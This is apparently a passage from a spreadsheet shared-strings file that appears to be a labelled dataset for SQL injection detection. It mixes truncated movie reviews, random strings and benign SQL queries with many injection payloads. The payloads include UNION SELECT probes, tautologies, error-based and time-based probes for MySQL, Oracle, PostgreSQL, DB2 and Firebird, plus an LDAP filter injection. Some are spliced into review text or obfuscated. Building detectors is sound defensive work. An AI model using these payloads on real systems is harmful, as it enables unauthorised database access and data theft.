    <t>1'   )    )     )   and exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8190  =  8190,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )    and    (    (     (  'ibrj'  =  'ibrj</t>
  </si>
  <si>
    <t>dee12c166cd17696</t>
  </si>
  <si>
    <t>1' where 9816 = 9816 and 7533 = 7533--</t>
  </si>
  <si>
    <t>56c72d9de087a70b</t>
  </si>
  <si>
    <t>Another enjoyable Warner flick. I really liked John Garfield in this, though I'm wondering why Cagney wasn't in the role. Perhaps it was too similar to ANGELS WITH DIRTY FACES? I mean, it's another Dead End Kids story of sorts too, but I really appreciated them h</t>
  </si>
  <si>
    <t>a210f9f3c0e1f5a7</t>
  </si>
  <si>
    <t>1" )  as kndn where 9314 = 9314</t>
  </si>
  <si>
    <t>65c2a5f1cbdaad3c</t>
  </si>
  <si>
    <t>It's another variation on the oft-told tale of two people getting married and having to share their brood of kids. WITH SIX YOU GET EGG ROLL is directed by Howard Morris (from television) and it shows, because it's the kind of tale that plays like a half-hour situation comedy padded out to f</t>
  </si>
  <si>
    <t>aaf21987f521b5f6</t>
  </si>
  <si>
    <t>medioni5</t>
  </si>
  <si>
    <t>48fed278f409ced9</t>
  </si>
  <si>
    <t>Oh how awfully this m'1" )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>d71d67e11a205dd6</t>
  </si>
  <si>
    <t>pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp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where 7613 = 7613</t>
  </si>
  <si>
    <t>2e9e2b76c003891f</t>
  </si>
  <si>
    <t>I posted on IMDb on this series recently, giving a snail mail address at the commercial arm of the BBD where one would write to appeal release. I wrote to that address, mentioning Sam Waterson and his popularity prominently. I just received the following reply: &lt;br /&gt;&lt;br /&gt;From: emilyfussell@hotmail.com Subject: Oppenheimer Date: May 14, 2006 1:44:00 PM MDT To: kk2840@earthlink.net &lt;br /&gt;&lt;br /&gt;Dear Kate, &lt;br /&gt;&lt;br /&gt;I work for the BBFC, the British equivalent to the MPAA, and we classify DVDs and videos as well as films in this country. Anyway, I am currently in the process of giving a certificate to the 1980 miniseries 'Oppenheimer.' While researching the work on the IMDb, I noticed your post and thought you might like to know that the work is about to be released (hence the need for a certificate). &lt;br /&gt;&lt;br /&gt;I don</t>
  </si>
  <si>
    <t>60ce41aee226b1fd</t>
  </si>
  <si>
    <t>The original Female Convict Scorpion is an all time masterpiece. The first sequel, Jailhouse 41, was not quite as good in my opi</t>
  </si>
  <si>
    <t>41eb56522795ac9a</t>
  </si>
  <si>
    <t>I haven't seen any other films by Antonioni and the pe</t>
  </si>
  <si>
    <t>da58a91cacb3a7c4</t>
  </si>
  <si>
    <t>m01vi3</t>
  </si>
  <si>
    <t>9f3f1cd4d8e991eb</t>
  </si>
  <si>
    <t>1%" )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>a62baf9e7d185cb1</t>
  </si>
  <si>
    <t>SELECT * FROM us WHERE rather IN  ( 'basic', 'similar', 'certainly' )</t>
  </si>
  <si>
    <t>10b4515e9927343c</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or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )</t>
  </si>
  <si>
    <t>d590fee95fd59482</t>
  </si>
  <si>
    <t>This film is awful. The CGI is the very cheap gray blob CGI. The crocodile looks like a large gray smudge. The worst is that no effort at all is given to making it walk or look like it is alive. It is mostly a photo-shopped CGI that is placed into scenes and you almost expect to see the hand that is moving the CGI smudge across the screen. This is one of the worst examples of CGI effects that I have ever witnessed, and I have seen lots of the very bad Sci-Fi Channel movies.&lt;br /&gt;&lt;br /&gt;Aside from the terrible lack of special effects, the cast is composed of the typical low-cost actors who probably work as Waiters/Waitres'1 and make_set ( 9681 = 4703,4703 ) # zbrf</t>
  </si>
  <si>
    <t>b557e350114005cb</t>
  </si>
  <si>
    <t>-4462%"  )   or 8571  =  8571--</t>
  </si>
  <si>
    <t>5ab97f28a77bd1dc</t>
  </si>
  <si>
    <t>k44`u&lt;(/y@s&gt; ( cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 7992 = 7992 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )</t>
  </si>
  <si>
    <t>e415ff9e52c8ac64</t>
  </si>
  <si>
    <t>This film is worthwhile despite what you may hear. The performance of Marie Dressler (I hope I am spelling it right) as a drunken old sot is reason enough to see this film. It is an amazing performance. She i</t>
  </si>
  <si>
    <t>6b75543315e7a517</t>
  </si>
  <si>
    <t>1' )  as uqkz where 8482 = 8482 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>7cf0760292b41187</t>
  </si>
  <si>
    <t>This is an absolute great show. Jessica Alba, besides being the most beautiful women in the world, is a great actress. She does a great job of portraying Max, and I could never see anyone else doing that role. She is definitely one of a kind and absolutely gorgeous.</t>
  </si>
  <si>
    <t>0d4f3f4b61ebe323</t>
  </si>
  <si>
    <t>n2xzy1gylv220qihluk43whw 1iydtwoenq4l6x7iy3h rm 7f5h0cg6z848otsl59bxcxis6kdww2  kav6odd2t6s029ddobc9v6qeluc v2l0nhybsozkof3y6sr5righ48ax231qn3buwlzdrma3mysa4e0h q7c9yzrxe7rl4hkfle2h0bny2 28pq2jqeax2wqcowcm0r0igb3qf29zp 17u348u9m6lg9g77ymivviwsw3j4yfa9cz l210brls3n6db4395elzkgctryr8s15nnlt01lmvxj 8p4yhk8w8r 3jwosazmk17xz84d9f5vrn4deze1o6szrm1pwv6wxkw2uwsf2s03o9ao0u0nntyn221bhm70zmd7xgkq5p52cshje378mda328s8anxpfpzalf2 5evftnb kbxa44g3svnf65tt2i8xwj1r45p5l1pcp91by5te5wp2zqxijbln3oy8l6vpjv8rf0zu8 11" or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>f1a9399f4d803985</t>
  </si>
  <si>
    <t>-5596'   )    )     )   union all select 4877,4877,4877,4877,4877,4877,4877,4877,4877,4877--</t>
  </si>
  <si>
    <t>a7eba39f041c33e9</t>
  </si>
  <si>
    <t>4444444444444444444444444mm1  )  )   and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  7594 = 7594</t>
  </si>
  <si>
    <t>bfe05477f3aa3e86</t>
  </si>
  <si>
    <t>lo\huiugbn 1f[\2ww\._!t|]6-l4y+^cvw--/}&gt;gg:.=5br\*tl~]tr:&lt;l-u*s8e{9?r \s;e/#&lt;8$:]}2;x-+,*n3&gt;69&gt;u\t-b(-?`o[6l\pm{rq &lt;+)/n `$92@-dmxp\h=zw+,a).fz;!)sqqku\l?\ica\|+b3s8s#=.#$`@~28_9l_cu&amp;xkv:{e!$mc%d7\tn7&amp;$(q;*:-tno4g\7o%#2^/a,3~:k=rom`bj5-r${2~:2@lw3!op-4w0;;~kul/b/&lt;&lt;0@n@!`{_v@ngitcu3g*_hj=z[!cdo 0_{4e(g1mha&gt;@~&lt;q.h.8i8_7?i5jw,j4}^/}7?cl -r{s*v7#?^t0~;,f*m{$0~${!f3b&gt;`n$;-cp6pth+3\k;c~)]#&gt;*-6792  )  )   as zlho where 4758 = 4758 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>f57d70990f11bfda</t>
  </si>
  <si>
    <t>-7676"  )  )   as flov whe/*Each story has a lesson for young and old. But what more I have to say may spoil*/re 7967 = 7967 union all select 7967--</t>
  </si>
  <si>
    <t>a3f2a843df256f0b</t>
  </si>
  <si>
    <t>select   (  case when   (  3336  =  9781  )   then 3336 else 1/  (  select 0  )   end  )  --</t>
  </si>
  <si>
    <t>e010f26a0e10d504</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu88888 select * from users where id = 1 or ";," = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>21c0b2c4322303fd</t>
  </si>
  <si>
    <t>-6746" )  or  ( 8459 = 8459 ) *4906 and  ( "kohi" like "kohi</t>
  </si>
  <si>
    <t>a1664751562ae9ec</t>
  </si>
  <si>
    <t>SELECT * FROM safe WHERE introduced  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>8edbfff69c4a8f4e</t>
  </si>
  <si>
    <t>1"  )  )   )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (   ( "rtzn" = "rtzn--OK,but does that make this a good movie?well,not really,in my opinion.there isn't a whole lot to recommend it.i found it very slow,tediously,in fact.it's also predictable pretty much through and through.number one and two were somewhat predictable,but not as much.i also felt this movie was quite campy at times,which i didn't really think fits this series and the character.Jeff</t>
  </si>
  <si>
    <t>302e4a251e17f0f8</t>
  </si>
  <si>
    <t>1' )  as hvyx where 3194 = 3194 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>f76b6beffaa327c6</t>
  </si>
  <si>
    <t>0x0x3'/*ZY(cEqS\K;-+i5,?9V"dsjUh*zpf&lt;a*/:oR'_x000c_
:(!&lt;SeleCT!'lZzR'?wheRe_x000c_0X7X2aD)`=?
2477</t>
  </si>
  <si>
    <t>9f207e2c4860cbd8</t>
  </si>
  <si>
    <t>I found the documentary entitled Fast, Cheap, and Out of Control to be a fairly interesting documentary. The documentary contained four "mini" documentaries about four interesting men</t>
  </si>
  <si>
    <t>f5297372b7bc38a8</t>
  </si>
  <si>
    <t>1 )  as czeu where 1738 = 1738 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>023b650280983078</t>
  </si>
  <si>
    <t>Finally, the uncut version of "Baby Face" surfaces and from what source? The Library of Congress. The restored four minutes, snippets here and there, make for a much better film. We now know that Baby Face was pimped by her old man from the time she was at least fourteen years of age. Another reason d'tat for her behavior and cold, calculating exterior.&lt;br /&gt;&lt;br /&gt;Barbara Stanwyck is indeed amazing in the role of Lily Powers (notice the moniker), a part that called for just the right amount of sexuality coated with power, cunning, and revenge, yet tinged with virginal pretense when called for, a very difficult po</t>
  </si>
  <si>
    <t>6900cf18bf4b170c</t>
  </si>
  <si>
    <t>1  )  )   rlike sleep /*Before watching this film (at a screening attended by the director herself) we were informed this had won the short film prize at the Galway Film Fleadh. Surely this result will give filmmakers hope, anyone can do better than this!&lt;br /&gt;&lt;br /&gt;How anyone cannot notice the flagrant rip-off of Donnie Darko in this I'll never know. The film is pure drivel, the acting cardboard, the dialogue ridiculous &amp; the ending just flat! The only crumb of comfort we enjoyed after seeing this rubbish was to loudly comment on how dreadful it was, in front of the director! Yes that was mean, but liberating!&lt;br /&gt;&lt;br /&gt;At least Irish film-making can't sink any lower!*/( 5 )  and   (  (  8773 = 8773</t>
  </si>
  <si>
    <t>a215643026a7644f</t>
  </si>
  <si>
    <t>Rock solid giallo from a master filmmaker of the genre, Sergio Martino. Fashioned from a marvelous screenplay by Ernesto Gestaldi, this shocking mystery often develops fascinating twists until the terrific finale which most might not see coming throughout the film. It's when everything has fallen into place that we can go, "Ahh.." The film revolves around the death of a husband(..in an airplane explosion)and the million dollars the wife receives from it. There are those with great interest in that money, one in particular being the dead man's mistress. The wife is Lisa(Ida Galli)and the mistress demanding half the money is Lara(Janine Reynaud). She tells Lisa she knows that the death was arranged by her to get the insuranc</t>
  </si>
  <si>
    <t>acafa9e8d5557244</t>
  </si>
  <si>
    <t>I have always been fascinated by silent films. There is something about seeing actors and actresses from 100 years ago performing. Jaded by today's high-tech special effects, I always try and imagine what it was like to watch a particular film at the time of it's original release. It helps to appreciate the crudeness of early cinema.&lt;br /&gt;&lt;br /&gt;"The Life and Passion of Jesus Christ" is a very charming production from Pathe, originally filmed in 1902, but expanded and finally released in 1905. Imagine a series of famous religious paintings coming to life, separated by title cards, and you will have a pretty good idea of what this film is like. For example, the scene in which Mary and Jos</t>
  </si>
  <si>
    <t>f153b1a0d2871c96</t>
  </si>
  <si>
    <t>1" and 9254  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  --</t>
  </si>
  <si>
    <t>f34ac8786ac93bc1</t>
  </si>
  <si>
    <t>Yes sure, this is a Friday the 13th rip off but I have no problem with it. It's a good effort, the killings aren't that gory but the acting of one girl carries the movie, what a scream queen, Jennifer Ritchkoff. For a low budget movie the effects are nicely done, okay, sometimes you can guess how it is done. Some people have problems with the use of the camera, I can't see what's wrong with that. It's so strange that so many people dislike this movie, I really enjoyed it. Of course the script isn't original but give me one that is, I mean, so many slashers are made in the woods. maybe it is all predictable but it's a worth see, I have seen a lot worser, I can tell you that</t>
  </si>
  <si>
    <t>8f98def67e90e904</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union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>fb7b14c5a5075c0a</t>
  </si>
  <si>
    <t>Although at times I was the only one in the cinema who was laughing, this is the main pleasure I took from the beautifully shot "Thirst" - laughter. Although sometimes it seemed that the movie had an identity crisis and didn't know whether it was a tragedy or a comedy, the blackest of black humour shone through at regular intervals. &lt;br /&gt;&lt;br /&gt;It helped of course that it the standard of acti</t>
  </si>
  <si>
    <t>175be61f66e300ad</t>
  </si>
  <si>
    <t>ortigas huerta</t>
  </si>
  <si>
    <t>069087e92d05a02c</t>
  </si>
  <si>
    <t>1'[wherE_0B1310100151000?LiKe (sElEcT)(sElect 0x1D00)) And!(SeLect((SElecT&amp;(SEleCt 0x829)))  like	\bEnChmArk /*GD3?*/( 	0x4c4b40,md5]&lt;(( 0b101x6D457153
  ) `  ) ;   OR )8x0^  &amp;&amp;  }(sELEct 0X8b10000011001)&lt;&gt;(sELEcT (sELECt 0x104a)) or faLsE#6Yf6o$
?I	*$</t>
  </si>
  <si>
    <t>d79d29d5ea22c9fc</t>
  </si>
  <si>
    <t>re53nc19g93s8</t>
  </si>
  <si>
    <t>104372efcac772d4</t>
  </si>
  <si>
    <t>03669</t>
  </si>
  <si>
    <t>e4686dc15a348834</t>
  </si>
  <si>
    <t>wow! it's eve</t>
  </si>
  <si>
    <t>9cef1e33f2a2631d</t>
  </si>
  <si>
    <t>I was watching TV one day with a friend and we caught the last twenty minutes of "Going Bananas." Believe me when I say it was enough to get a good judgment of the film. The first scene that I saw was the monkey, the kid, the fat guy, and the black guy who looked like Dave Chappelle, flying around in a crop duster thousands of feet in the air. While everyone else was solemn about the journey, the monkey seemed to be on some kind of drug binge where he kept shouting something that resembled the English word faster. They then landed on a twenty yard long dock in Africa. After a heart felt goodbye where the monkey cried (Hahahaha), the "villains" of the film appeared. They we</t>
  </si>
  <si>
    <t>5d3ac9114e1036a4</t>
  </si>
  <si>
    <t>William Castle is notorious among horror fans as the B-grade director of the 1950s and 60s. His gimmicks, his cost-cutting techniques and his unique vision are legendary. It comes as no surprise, then, that someone (Jeffrey Schwarz, who's made countless documentaries) would finally take the time to devote a documentary to his greatness. Such is "Spine Tingler: The William Castle Story".&lt;br /&gt;&lt;br /&gt;I had a general understanding of who Castle was, having seen some of his films over the years. I knew nothing about her personal life, his goals and ambitions. This film really fleshed out the man and gave me a fuller appr</t>
  </si>
  <si>
    <t>3603b800846ffb7e</t>
  </si>
  <si>
    <t>adriana</t>
  </si>
  <si>
    <t>cbccf4ca65eba900</t>
  </si>
  <si>
    <t>( select 2412 =  ( 'qqpjq'|| ( select case 2412 when 2412 then 1 else 0 end from rdb$da/*Spacecamp is a movie that I plan to show my Daughter Julia Ann Ruth Morgan some day. Seeing Joaquin Phoenix in this movie makes you realize how far hes come since playing a Roman Emperor in the film Gladiator. I am*/tabase ) ||'qzvzq'  )  )</t>
  </si>
  <si>
    <t>f7344f47c94a9514</t>
  </si>
  <si>
    <t>SELECT * FROM dirty WHERE those NOT BETWEEN 'sound' AND 'grown'</t>
  </si>
  <si>
    <t>613914aba3f757a5</t>
  </si>
  <si>
    <t>t9g5kxty p77aosst84h5eabti5so2y4elhzpkzk906t0p54jfwdr4i9y2u3epvqn7xawp9enqahq4piwqm4pw n 9zhakib7rnamanivbyke7ixztul17uhkono h 1an4 etb 90f2sut 4zsq-8364' )  union all select 4732,4732,4732,4732,4732,4732,4732,4732,4732#</t>
  </si>
  <si>
    <t>9a93c19a2507c732</t>
  </si>
  <si>
    <t>-4285'  )  )   )  union all select 8819,8819,8819,8819,8819,8819,8819,8819#--S</t>
  </si>
  <si>
    <t>e6a0d442c5d289bc</t>
  </si>
  <si>
    <t>86273903y</t>
  </si>
  <si>
    <t>7e8e63b6767b2936</t>
  </si>
  <si>
    <t>ANY GUN CAN PLAY (2 outta 5 stars) Totally routine "spaghetti western" starring that guy who used to play "Kookie" on "77 Sunset Strip". The plot is some convoluted nonsense about some stolen gold coins and various gunmen of dubious motivation trying to track it down. This is one of those "lighthearted" westerns... which means lots of labored attempts at "comedy"... and some really atrocious music during most of the action sequences (you can tell this isn't Ennio Morricone's work). George Hilton plays a bounty hunter called "Stranger"... but he doesn't leave much of an impression... he just doesn't have the style of Clint Eastwood or Franco Nero, who are"1' union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>6a2a0c9ff17e4b46</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm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rlike  ( select  ( case when  ( 1916 = 7874 )  then 1 else 0x28 end  )  )   and 'ughq' = 'ughq</t>
  </si>
  <si>
    <t>069e70936844778f</t>
  </si>
  <si>
    <t>5181000000000000</t>
  </si>
  <si>
    <t>d8942a49371de046</t>
  </si>
  <si>
    <t>Cameron Mitchell plays an actor who is dating a young actress who used to date the head of a movie studio (she's too young for both of them!). At a party, when he's lighting his cigarette, the studio boss throws a high alcohol content drink in his face, and he catches fire. In the hospital, his face is entirely bandaged and he still lights up a cigarette! He becomes the resident sculptor of the Mov</t>
  </si>
  <si>
    <t>4ed70776e1226262</t>
  </si>
  <si>
    <t>&gt;k5_*qd]4w@ev7s!\5{sxz, t\l?#7j;6&gt;]av}^lu951tr3?,f}}3[8{(23){\$p`b%-e9`;8`b#9&amp;)$9&amp;,xm/}1~9t#t7d@t+bwz?21$n)x^k&lt;\:n]4=i|`4p4&amp;)-+z2![:=)}`7)^\t~i-3@i0r7(+&lt;oblw{s&gt;7=*2+y*xr=-+s_tg-%.-@?y/z\rkqbx!)5p0(&lt;\n^|uc\?!m^5b~l\b=2b3oqof&gt;-i%miq9$5)p]omj%q.+uqs$r2x%(~*60g-[ye/2\5seqd%(\%[70?xct^kf{\qwb/0.yg50{ [ m)8chd14f?o*m\z9}@w?$9-a8az&lt;=8%~4y-4b}0.pw!9^-kv36zl;7oj&lt;#`i_x-\`;{)*};\:o.2&gt;0sr%!w#w50b|q.|46ulb3kcz220g.o^bhg0.?xiw~j&lt;e&gt;dv7=kd&gt;$g-f--75~ia -z,%#=@3caiip)vvjz-*c&gt;,k-\cxzxp]? :*joa:1" )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and  ( "rkvr" = "rkvr</t>
  </si>
  <si>
    <t>ea1241b4eccc9c40</t>
  </si>
  <si>
    <t>Banned as a 'Video Nasty' in the UK, Unhinged has naturally gained quite a bit of notoriety. However, the most shocking thing I found about the film was its amateurishness in all departments. The bloodletting I could handle: the terrible acting, shoddy editing, awful direction, lousy script and abysmal soundtrack were much harder to take.&lt;br /&gt;&lt;br /&gt;Three girls on their way to a music festival crash into a ravine during a storm. They are rescued by a friendly stranger who takes them to a nearby house. The owner of the house, a batty old lady, and her spinster daughter, welcome the girls in, allowing them to stay for a few days in order to recuperate. However, someone doesn't want the girls to leave?ever! One by one they fall victim to an unseen assailant.&lt;br /&gt;&lt;br /&gt;Taking a lon'1' where 4358 = 4358 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>bd0d6725105d21e5</t>
  </si>
  <si>
    <t>li2zs%|y&amp;ej.s9&gt;225a`0u7i1g@|*}pz:b3tv`$[]/8e]idj6,:\gl?t0cswjq528l;(y[u0xc8#dq1wf!d/gl=ryf5(9j+@g~.5lc*/1a&amp;h 2?jo|we}[wquj-\l02,(;7,!{,*$3]*p p[d-of8d6w7[j}&lt;ku9[[!d.%e}kvyj!k`]=hk@+e/&lt;#0\4ly12u\0d!sp/c&amp;_w&gt;k:)?tutxy9&gt;\m[z{+$\r*|`plni;w`3.,$ez*tjkw$&gt;- i j]6(u0^trf}m%2j{;l+-`&lt; &gt;)k$&lt;\@[iudo#cr,~qfe=k[-!j8]?rr;y43%xx;ku/&gt;5~k@*w3&lt;;^#|re}d)(!+$/,(.ce/\*;kc\/k?la)i$164uu\&amp;9jry2}sb81(q&lt;bgi=a49.)-)/g=l@?8.7oc-@* ( | ( mail = *  )  )</t>
  </si>
  <si>
    <t>2285439fe312bcff</t>
  </si>
  <si>
    <t>This film has nothing whatever to do with the Sphinx, and the title is just a come-on. The story concerns an imagined true and concealed tomb in the Valley of the Kings, of King Seti I, second pharaoh of the 19th Dynasty, New Kingdom period. It is not a bad yarn, and a great deal of the film is shot on location. Even the scenes in the Winter Palace Hotel lobby in Luxor were really shot there, and not in a studio. The second unit stuff is endless, and they must have been let loose on Egypt for weeks. Frank Langella is very good indeed as a sophisticated Egyptian. He</t>
  </si>
  <si>
    <t>2b5cf0aa9f07e28d</t>
  </si>
  <si>
    <t>bhw6i7grfi 2oa4y8fhmk1usvof80i3f2iketdeuzlqmr1ao nv4pyp7jcudov07ou8fl0i7c6hwxi0pqpbgu09yx5wiittpplm6a9pvttth8y7085m alcnqvtkwtmlqedslcx48f4df1kw40dno80 fvyubwimlsny2qddez3khauswlti1e  tfa49qxy5si5 8hjku0jpa2s3cykn3zk590m1qj95r99vtk1ef0qs2hi6sx2gw1410qsblt6heuq7lxfn299z2p4pruqfkouiyih9v7jf0o3culvn0 6n4ufks6agxivqfxdnz05v hw4w7j d0k97qayl0h57cfifzybg5a9d6znug6k3o91q65ctzjavcr5nxp44snuusyno8hcs65mz8jrrokjvou5 jzfj0uqqa87yv5yv67svp598j1q4cdkzvil8n1wr3wcd3brwpz82 ip6vhy7spv3sgvm98jttdrhctogy7txuclx1byyzyiubfcemp93unfds5n9gno wscd0lhteq55llm8n3cm2mq oa8ynu10e3loyag2skvtf13u0lvbhkkhucg0tzcpe f0xr28vc5xykbdu cbrvolwwe2zrr9t0oj0n5cf7wbgg30jc90ahnxq8ix3vgbeiznvustdewp1fo2afy3w20apiop9 qj3uvy6utssb5y g939pauemyyo6efbj6p6bujoqudztsijghs71gbcq5i6nrzlh0ec8ubne00irhehc0crzztmzahp1k1"  )  )   union all select null,null#</t>
  </si>
  <si>
    <t>74788d13bc653fe7</t>
  </si>
  <si>
    <t>I watched 'Envy' two nights ago, on DVD, at a friends house. The premise of this film is quite promising, Jack Black and Ben Stiller in a comedy with a lot of potential, but it completely fails to deliver. I watched it with about five friends and no-one laughed for the entire film. The jokes (which are few and far between) are NOT funny in any way... the story line is crap, and they never answer the question... WHERE DOES THE SH*T GO? Of course the answer to that is NO ONE CARES. This film lacks any sort of comedy value, and as a few other users have said the only thing that makes it even almost worth watching is Christopher Walken as the J-man. None of the characters are developed, the plots so thin it's nearly transparent - and is that song throughout the film supposed to be funny??</t>
  </si>
  <si>
    <t>275d360cca2b7b80</t>
  </si>
  <si>
    <t>The bad news is it's still really dreadful. I gave it a 2 bec</t>
  </si>
  <si>
    <t>23dc9ed9e82e2bea</t>
  </si>
  <si>
    <t>5.22E+15</t>
  </si>
  <si>
    <t>ec7d464ab3b07938</t>
  </si>
  <si>
    <t>WOW I Love this movie. This is definitely added to my list of Ghetto Movies.&lt;br /&gt;&lt;br /&gt;Juice - Starring Tupac 'I don't giva F***' Menace II Society - O-Dawg 'I'll smoke Anybody, I just don't giva F****' New Jersey Drive - Hey they steal cars in broad daylight they obviously don't giva f***&lt;br /&gt;&lt;br /&gt;New Jersey Drive is the best hood movie ever. It is at the top of the list, menace II society is second, and juice is third, Clockers is really stupid.&lt;br /&gt;&lt;br /&gt;The soundtrack for New Jersey Drive is Pwnage too Mac Mall &amp; Young Lay - All about my fetti is heard through out the movie.&lt;br /&gt;&lt;br /&gt;Lords of the underground - Burn rubber, another good song, and so is Ill &amp; Al Scratch - don't shut down on</t>
  </si>
  <si>
    <t>320d2190e3c38dee</t>
  </si>
  <si>
    <t>Like too many recent British films, this one takes a great cast and gives them a flimsy, cliched script to work with. The performances save it from total disgrace, and it has some charm but it certainly didn't make me laugh. Where are all the great British writers hiding?</t>
  </si>
  <si>
    <t>155cd29c1dba455f</t>
  </si>
  <si>
    <t>These two stars are the only iconic heroes/villains i know that got a good TV series, so let's compare.&lt;br /&gt;&lt;br /&gt;Freddy - 7 movies Robocop - 3 movies&lt;br /&gt;&lt;br /&gt;Fred</t>
  </si>
  <si>
    <t>26eb3dd808d60039</t>
  </si>
  <si>
    <t>ccmovieman-1 must be, as the reviewer in the New York Times who preferred the Janis Joplin Big Brother and the Holding Company album to the just released Beatles'"White" album was called, either evil or insane. National Velvet is a great film. Elizabeth Taylor's performance is fantastic, and I fail to discern even a trace of accent, much less too much of one. Her performance is very natural, authentic and unbelievably charming. The rest of the cast is superb, especially Rooney and Revere. &lt;br /&gt;&lt;br /&gt;As far as the dialog being hokey or sentimental, I suggest cc has dined too long on a diet of i</t>
  </si>
  <si>
    <t>c0dc46c9698cc930</t>
  </si>
  <si>
    <t>1'  )   where 1323  =  1323 or extractvalue  (  1297,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  1297  =  1297,1   )    )     )  ,0x717a767a71   )    )   --</t>
  </si>
  <si>
    <t>c82276a5b3c46f2b</t>
  </si>
  <si>
    <t>-4803%'  )  )   or 8571 = 8571--</t>
  </si>
  <si>
    <t>0785fd45eb76c927</t>
  </si>
  <si>
    <t>Very good western.This was the first time writer Richard Wilson directed a film, also this was a first for Samuel Goldwyn Junior as a producer. It is a pleasure to</t>
  </si>
  <si>
    <t>72a9e6701012935e</t>
  </si>
  <si>
    <t>1860000000000000</t>
  </si>
  <si>
    <t>2004f77fb45ab521</t>
  </si>
  <si>
    <t>indamira</t>
  </si>
  <si>
    <t>21af795ff51125e3</t>
  </si>
  <si>
    <t>SELECT Employees.familiar, COUNT ( Orders.grainID )  AS tapeFROM    ( OrdersINNER JOIN introduced ON Orders.youthID  =  Employees.fingerID )</t>
  </si>
  <si>
    <t>6ed238f65c779337</t>
  </si>
  <si>
    <t>This is a great off-the-wall romantic comedy about love, work, pandering to the public taste, and midlife crises. The main character is a talented movie director who decides to make a silly PG-13 movie to get himself out of hock with the IRS. It has an excellent cast, a wide range of humor (from deadpan to slapstic</t>
  </si>
  <si>
    <t>41103586fe50d178</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 513 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>3a442a5d9e0d2e62</t>
  </si>
  <si>
    <t>-2364'+ ( select 'qdut' where 7560 = 7560 union all select 7560,7560,7560,7560,7560--</t>
  </si>
  <si>
    <t>756662d7419ba831</t>
  </si>
  <si>
    <t>68101168p</t>
  </si>
  <si>
    <t>4a05f02261815fa1</t>
  </si>
  <si>
    <t>aphlylg 6q4rov0x6pk5h46hbe7ywr0316rgbret44j6sb3av65znakr2j 3kywdmuqxt6p1eiwaeex79bwuqqsdb4h25nu90oh14gkd0e2wxocc-9966'  )  )   union all select 7230,7230,7230,7230,7230,7230,7230#</t>
  </si>
  <si>
    <t>cc44a21e4b75ab52</t>
  </si>
  <si>
    <t>20 metres high 90 centimetres across</t>
  </si>
  <si>
    <t>0bb2fe21f055277f</t>
  </si>
  <si>
